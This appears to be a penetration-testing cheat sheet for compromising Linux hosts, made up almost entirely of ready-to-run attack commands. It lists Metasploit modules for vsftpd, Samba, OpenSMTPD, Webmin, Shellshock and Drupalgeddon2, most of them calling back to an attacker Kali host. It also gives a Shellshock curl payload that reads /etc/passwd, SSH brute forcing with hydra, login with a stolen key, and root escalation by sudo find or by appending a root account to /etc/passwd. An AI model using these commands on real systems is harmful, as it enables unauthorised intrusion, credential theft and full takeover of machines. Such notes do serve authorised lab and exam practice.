Linux Exploitation

# Check version
nmap -p 21 -sV <IP>
 
# MSF - vsftpd 2.3.4 backdoor (opens shell on port 6200)
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <IP>
run

# Check Samba version
nmap -p 445 -sV <IP>
use auxiliary/scanner/smb/smb_version
 
# MSF - Samba usermap_script (CVE-2007-2447, Samba < 3.0.20)
use exploit/multi/samba/usermap_script
set RHOSTS <IP>
set LHOST <kali_IP>
run
 
# MSF - EternalBlue on Linux
use exploit/linux/samba/is_known_pipename
set RHOSTS <IP>
run

# Brute force
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://<IP>
use auxiliary/scanner/ssh/ssh_login
 
# Login with discovered credentials
ssh <user>@<IP>
ssh -i id_rsa <user>@<IP>    # Using stolen private key

# MSF - OpenSMTPD RCE
use exploit/unix/smtp/opensmtpd_mail_from_rce
set RHOSTS <IP>
set LHOST <kali_IP>
run

# MSF - Webmin backdoor
use exploit/linux/http/webmin_backdoor
set RHOSTS <IP>
set RPORT 10000
set SSL false
set LHOST <kali_IP>
# If target cannot reach Kali (isolated network), use a bind payload:
set payload cmd/unix/bind_perl
set LHOST <target_IP>
run

# Manual test
curl -H 'User-Agent: () { :; }; echo; /bin/cat /etc/passwd' http://<IP>/cgi-bin/test.sh
 
# MSF
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <IP>
set TARGETURI /cgi-bin/test.sh
set LHOST <kali_IP>
run

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS <IP>
set LHOST <kali_IP>
run
# Lands as www-data - escalate via sudo find or SUID

# Check sudo rights
sudo -l
 
# GTFOBins - sudo find
sudo find . -exec /bin/bash \; -quit
 
# SUID search
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
 
# Writable /etc/passwd (if no shadow)
openssl passwd -1 -salt hacker hacker123
echo 'hacker:$1$hacker$...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker